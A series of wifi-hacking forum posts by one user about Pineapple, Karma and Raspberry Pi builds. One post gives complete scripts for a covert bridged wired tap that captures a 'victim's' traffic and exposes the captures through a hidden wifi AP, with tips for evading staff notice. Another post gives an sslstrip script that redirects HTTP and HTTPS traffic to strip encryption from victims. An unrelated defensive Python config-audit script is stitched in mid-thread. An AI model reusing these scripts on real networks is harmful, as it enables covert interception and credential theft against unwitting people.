Posts posted by telot

  1. 1) Likely. The only red flag for me is the mobile version's USB devices. It depends how much amperage your USB hub is provided and thereby providing. Having two radios receiving/transmitting could cause intermittent issues if there is not enough power for both of them.

    2) Yes. Ethernet cable to PC. See Darren's wifi pineapple book for setting up the proper settings. You do not need PoE. Power the AP1221U separately and connect your PC to the PoE/LAN plug.

    3) I'd do the pineapple myself. Remember, when someone first broadcasts the SSIDs of known networks they're looking for, it's the strongest signal that wins.

    4) No clue. I'd buy the one from the hakshop to be sure (and also support the team that made all this possible!).

    telot

  2. Mr-Protocol: For sure. I'm still waiting with bated breath for Seb to release a new firmware with interceptor support (it's been talked about since the mark4 came out, but I'm still hopeful).

    inTheDMZ: I got Karma going as well on a previous project with the pi - digininja's guide was pretty easy to follow. I decided to go with the NHA for my pi-karma as well as this interceptor version. The card is just robust and awesome and wireless-N. I've left Karma off this build so far, because I ran out of time, and I'm not sure it's a feature that everyone would want with a device like this. Karma is something that a good (or even semi-good) sysadmin would notice over time, and bringing attention to your wireless/wired network tap is probably not a good idea. Regardless, I'll still build it in so the option is there for people.

    Cheers

    telot

  3. The Interceptor has long been kind of a dead project. It makes sense too. The fon+, the hardware Robin Wood originally wrote his interceptor code for, is way past EOL, hard to find, and under-featured given the current landscape of embedded/SoC offerings. By borrowing some of irongeek's raspberry pi recipes, and adding in some pi-point, I was able to get very similar functionality out of my raspberry pi. Here's how.

    Hardware:

    Raspberry Pi Model B

    32GB SD Card

    Belkin 4 port powered USB hub

    Alfa wifi card (NHA, from the hakshop)

    USB Ethernet adapter (also from the hakshop)

    OS:

    Latest image of Raspbian

    Software: All can be apt-get installed

    bridge-utils

    tcpdump

    hostapd

    fkill

    zd1211-firmware

    hostap-utils

    iw

    dnsmasq

    Edit /etc/network/interfaces to look like this:

    auto lo
    iface lo inet loopback
    iface eth0 inet dhcp
    iface wlan0 inet static
    address 192.168.0.1
    netmask 255.255.255.0

    Edit /etc/dnsmasq.conf

    # Never forward plain names (without a dot or domain part)
    domain-needed
    
    # Only listen for DHCP on wlan0
    interface=wlan0
    
    # Create a dhcp range on your /24 wlan0 network with 12 hour lease time
    dhcp-range=192.168.0.5,192.168.0.254,255.255.255.0,12h

    Edit /etc/hostapd/hostapd.conf (notice it is WPA with the pre-shared key at /etc/hostapd-psk - the SSID is also hidden)

    # Bind to the Alfa card and use the nl80211 driver
    interface=wlan0
    driver=nl80211
    ssid=monkey
    channel=1
    # 1 = open system authentication only (no WEP shared-key auth)
    auth_algs=1
    # wpa is a bitfield: 1 = WPA, 2 = WPA2/RSN; wpa=1 offers WPA only
    wpa=1
    # Per-client pre-shared keys are read from this file (created below)
    wpa_psk_file=/etc/hostapd-psk
    wpa_key_mgmt=WPA-PSK
    wpa_pairwise=CCMP TKIP
    # rsn_pairwise only takes effect when the WPA2 bit (wpa=2 or wpa=3) is set
    rsn_pairwise=CCMP
    # Leave the SSID out of beacons
    ignore_broadcast_ssid=1

    Next, create/edit /etc/hostapd-psk

    # 00:00:00:00:00:00 is hostapd's wildcard entry: this passphrase is accepted for any client MAC
    00:00:00:00:00:00 YourSuperLongAndSecurePasswd

    We're all set! Below you'll see my script for the intercepting portion of the monkey. Feel free to put it in /etc/rc.local to make it run on boot up.

    #!/bin/bash
    # Change settings below to match network
    eth_ip="192.168.1.199"
    eth_netmask="255.255.255.0"
    eth_broadcast="192.168.1.255"
    
    # Create a bridge joining the onboard NIC (eth0) and the USB Ethernet adapter (eth1)
    brctl addbr mybridge
    brctl addif mybridge eth0
    brctl addif mybridge eth1
    # Strip addresses from the member ports and bring them up in promiscuous mode
    ifconfig eth0 0.0.0.0 promisc up
    ifconfig eth1 0.0.0.0 promisc up
    ifconfig mybridge promisc up
    # Give the bridge itself a management address on the wired network
    ifconfig mybridge $eth_ip netmask $eth_netmask broadcast $eth_broadcast
    # Capture everything crossing eth1 to a pcap, in the background
    tcpdump -i eth1 -w /root/cap.pcap &

    And here is my script for the wifi access point portion of the monkey, again you can put it in rc.local

    #!/bin/bash
    # turn on forwarding so wifi clients can reach the wired side
    echo 1 > /proc/sys/net/ipv4/ip_forward
    
    # enable NAT (no -o filter, so it masquerades everything leaving the Pi on any interface)
    iptables -t nat -A POSTROUTING -j MASQUERADE
    
    # start the access point in the background (-B) with the config above
    hostapd -B /etc/hostapd/hostapd.conf

    Now you're passing along all wired traffic to and from your wired victim, all whilst capturing every packet that goes by. You can then surreptitiously nab the pcap via the hidden wifi AP.

    What it doesn't do:

    Unlike the interceptor, it doesn't clone the traffic and pipe it over wifi and/or vpn. It merely captures the traffic and stores it for later retrieval. This was necessary with the original fon+, because there was no usb port, and only a dozen or so MB of storage. Now with USB and storage cheaper than ever, you can store days/weeks/months of captures if you want.

    Things to add:

    -Cronjob that will only turn on the wifi at certain times such as after business hours. That way no employee who happens to be chilling with airodump-ng running notices anything odd.

    -Cronjob that changes the wifi card from master mode to managed and connects to a wifi access point as a client to securely send the cap files. In doing so you could also send an email/upload a status file.

    -Add Jasager functionality to the wifi AP (this one's the biggie)

    -Add the all-important sslstrip functionality (something I've tried but can't get to work - if there's interest, I'll happily share my findings)

    -Add in Moriarty's awesome new UWUI

    So that's it! I've been testing this for the last several hours and it works great. Hope you guys find this interesting enough to give it a try yourself and post your experience here.

    Long live the interceptor monkey!

    telot
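A defender-side check on the hostapd.conf in the post above, written as an added example (not telot's code): it parses a hostapd.conf and flags the settings a network owner auditing their own AP would want to know about, namely WPA-only (wpa=1), TKIP still permitted, rsn_pairwise silently ignored, and a hidden SSID relied on as if it were a control. SAMPLE_CONF is the config from the post; the parser and the audit rules are my own.

```python
"""Audit a hostapd.conf for weak WPA settings (constructed example)."""
from typing import Dict, List

# Constructed sample: the hostapd.conf from the post above, verbatim.
SAMPLE_CONF = """\
interface=wlan0
driver=nl80211
ssid=monkey
channel=1
auth_algs=1
wpa=1
wpa_psk_file=/etc/hostapd-psk
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP TKIP
rsn_pairwise=CCMP
ignore_broadcast_ssid=1
"""


def parse_hostapd(text: str) -> Dict[str, str]:
    """Parse key=value lines; blank lines and # comments are skipped, later keys win."""
    conf: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        conf[key.strip()] = value.strip()
    return conf


def audit_hostapd(conf: Dict[str, str]) -> List[str]:
    """Return one finding per weak setting; an empty list means nothing was flagged."""
    findings: List[str] = []
    wpa = int(conf.get("wpa", "0"))  # bitfield: 1 = WPA, 2 = WPA2/RSN
    if wpa == 0:
        findings.append("wpa=0: open network, no encryption at all")
    if wpa & 1:
        findings.append("wpa bit 1 set: legacy WPA(1) is offered; use wpa=2")
    if not wpa & 2 and "rsn_pairwise" in conf:
        findings.append("rsn_pairwise is ignored because the WPA2 bit is not set")
    if "TKIP" in conf.get("wpa_pairwise", "").split():
        findings.append("wpa_pairwise permits TKIP; restrict to CCMP")
    if int(conf.get("auth_algs", "3")) & 2:  # hostapd default allows shared-key auth
        findings.append("auth_algs allows WEP shared-key authentication")
    if conf.get("ignore_broadcast_ssid", "0") != "0":
        findings.append("ignore_broadcast_ssid: a hidden SSID is not a security control")
    return findings
```

Running audit_hostapd(parse_hostapd(SAMPLE_CONF)) yields four findings for the posted config; a config with wpa=2, rsn_pairwise=CCMP, auth_algs=1 and a broadcast SSID yields none.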

  4. You're looking for the interceptor. See the hak5 video on it. Unfortunately the hardware is hard to find these days (fon+). Irongeek has some how-tos on his site on using a raspberry pi, which is the direction I would recommend if you've got one handy.

    Otherwise the wifipineapple mark4 should be able to be used as such, but it will cease to act as a pineapple as far as I can tell, and instead be more like an interceptor. This has not been done before, so it will likely cause headaches, but what's awesome is you can share what you learn with the community and get mad bonus points!

    telot

  5. Not all the tools are available in apt. Many of them are, but not all (metasploit for example). BT is so popular because they've got all the dependencies, done all the tweaking, and worked through all the bugs for you. It's ready to roll, with nearly every tool available.

    BT is based on Ubuntu, as you mentioned, so there is certainly nothing stopping you from loading what tools you'd like into Ubuntu. I certainly don't need every tool in backtrack, so I just pick and choose what I'm interested in. That said, I always keep a live disk and Backtrack VMs around just in case.

    telot

  6. You are quite welcome, skrite.

    In order to have backtrack see the alfa, you forward USB devices to the guest OS. Each virtualization suite will handle this differently, but they all have the feature.

    To get a proper IP from your router (not NAT via your host) to the VM - simply set up bridge mode (at least that's what it's called in virtualbox) for your VM. That way you can scan as if you're on the network, just as your mba is.

    telot

  7. As a fellow mba owner, I can understand why ubuntu (or windows) dual booting is not ideal. OSX is highly optimized for Apple's hardware and vice versa. You sacrifice battery life and oftentimes driver efficiency by booting into anything but OSX. It's a tradeoff that 90% of consumers never have to deal with, as they just stay in OSX full time. With that in mind, I would recommend going with a virtual machine of backtrack or ubuntu if you need the tools, but for the most part I just do like you were saying and use the terminal and wireshark in OSX.

    The other downside to going with apple is it doesn't work great with the pineapple's ICS (as you saw from the link from an inebriated Mr-Protocol), but it is workable.

    These are all tradeoffs we have to make in order to enjoy a great, if not the greatest, laptop.

    telot

  8. DrDinosaur - I believe Darren was using mdk3 for his occupineapple stuff. I can't really remember the details, but I'm a command line guy myself, so if you ssh into the pineapple, you can use these commands:

    opkg update

    opkg install mdk3

    Then run the various mdk3 commands that Darren uses for the spoofing of a list of fake SSIDs.

    pr0l3 - Have you read the pineapple book? See the pinned thread on these forums. If you're still having trouble, start a new thread and give all the details you can and I'm sure we'll be happy to help.

    telot

  9. Is there a reason you want to run all those separately? I'd take a look at running these alternate OSes in virtual machines. If you get the ODD adapter you're talking about, put the 500GB in there and then buy a SSD for your main OS, of which I'd recommend windows or a well suited distro of linux (not backtrack). Also throw in an 8GB stick of ram (super cheap) and you're set. Running backtrack and windows 7 at the same time, each with 2GB of ram, each pulling as much space as they want from the big old 500GB - all while leaving you with the same 4GB of ram you have now plus a new screaming SSD for your host OS. There's lots of advantages to this such as snapshots, not constantly rebooting to get into another OS, you can set up VLANs between your "victim" and "attacker" so you won't accidentally hack your roommates, etc.

    telot

  10. wychwood: Welcome to the pineapple community! We're always glad to have another pineappler added to our ranks.

    Here is a link for a powered USB hub that I and other heavy users utilize every day with great success:

    http://www.newegg.com/Product/Product.aspx?Item=N82E16817394106&Tpk=F5U404PBLK

    Perhaps the next iteration of pineapple hardware can be even more specialized and offer us 2 or 3 over-spec-powered usb ports...

    telot

  11. Hello all

    I've been playing with my pineapple and my newly created raspberry pi running karma (all hail digininja!). Normally I test my karma'ing with my trusty "victim" laptop, but this time I decided to use my ipad instead. I couldn't help but notice that when I have sslstrip running, few apps are able to load, and when they do, there is usually some erratic behavior in the app. Either they sit and spin (loading animation) or just straight up fail (...Please check your network connection) or other bizarre behavior (facebook app on iphone says I have no friends when I go to my News Feed). This to me is quite the red flag raised to the vast majority of real world victims, who unless you're targeting a specific person's laptop with white/black lists, will no doubt be using a smartphone/tablet. With the proliferation of "post-pc" mobile devices, the lack of internet-connected-app support does not bode well for those of us who enjoy the benefits of sslstrip.

    Anyone have any ideas on how I can fix this? It must be something in my sslstrip preparations/command that I can change, right? Here is my usual "dump 'n strip" script that I run via WPS button press.

    #!/bin/sh
    # Capture everything on the pineapple's client subnet to the USB stick, in the background
    tcpdump -i eth0 -w /usb/cap.pcap -n net 172.16.42.0/24 &
    # Redirect client HTTP (80) and HTTPS (443) connections to sslstrip's default listener (10000)
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports 10000
    # sslstrip listens on 10000 by default and writes its log to the USB stick
    sslstrip -w /usb/sslstrip.log &

    I know, the port 80 to 10000 is weird, but that's what was in the how-to sslstrip forum post and I've been using this script for 6 months and it works fabulously otherwise. Any help is much appreciated fellas, as always!

    telot

  12. Parity: I recently learned about this by way of Security Onion. I needed a way to sniff all my traffic in order to run snort and snorby and all these awesome intrusion detection tools (which work best by sniffing the entire network's traffic). For the most part, yes, you'll find these "span" ports on commercial, industry grade switches (mega $$$) but there is a cheap alternative. The company is kind of no-name (Mikrotik), but the product is totally sound. I've been using it for months and it works as advertised without fail.

    http://www.roc-noc.c...rd/rb250gs.html

    TheKingUnderTheHill: Another option is to sneak a passive lan tap in there. You can buy one of the two available on the hakshop, or you can build your own quite easily with some spare cat5 cable and some female ends, which you can pick up at home depot...hehe pick up some females at home depot...

    telot

  13. The way that I know is by using Airbase-ng - a tool found in the aircrack-ng suite. Vivek has some videos on using airbase in his wifi megaprimer on securitytube.net. There are pros and cons to using airbase over the pineapple (i.e. you can capture a WPA handshake with airbase). As cool as airbase is, I must warn you - it's not nearly as slick as the pineapple is. There's a lot of benefit to using specialized hardware for this task. As an example, you have to configure your own DHCP server if you want to use airbase effectively, whereas the pineapple of course is essentially all plug and play.

    Since Mr. P didn't really answer this aspect of your question: the fon is another kind of wifi router that the karma/jasager was originally developed for by Mr. Robin Wood (aka digininja). Just google fon router and you'll find all the info you need about it.

    Good Luck!

    telot

  14. Honestly, a wifipineapple might be a decent way to start. It's a great platform for getting your head around networking in general, sniffing traffic, deauthing (taking down an access point), phishing, and pranks. Watch the episodes on it and pore through the forums and wiki. Go back and read some old forum posts with lots of views and replies to see what problems and questions people have had.

    telot

  15. odroid x2 might give you the oomph you're looking for petertfm, though multiple core support would be a must to get max benefit from it...

    http://www.hardkernel.com/renewal_2011/products/prdt_info.php?g_code=G135235611947

    The pi would be a good replacement as well - I've been using pwnpi to run my pineapple for months now and it works great. Use the pi when I need some horsepower (msf and set...though msf is pretty slow still) and use the pineapple solely for karmaing, stripping and dumping.

    Either way, this UI is looking sicker and sicker - can we get some instructions for use on the pineapple Moriarty? I'm sure I can get it going, but with all this rummed up eggnog, I think getting step by step instructions would be most appreciated! lol

    telot
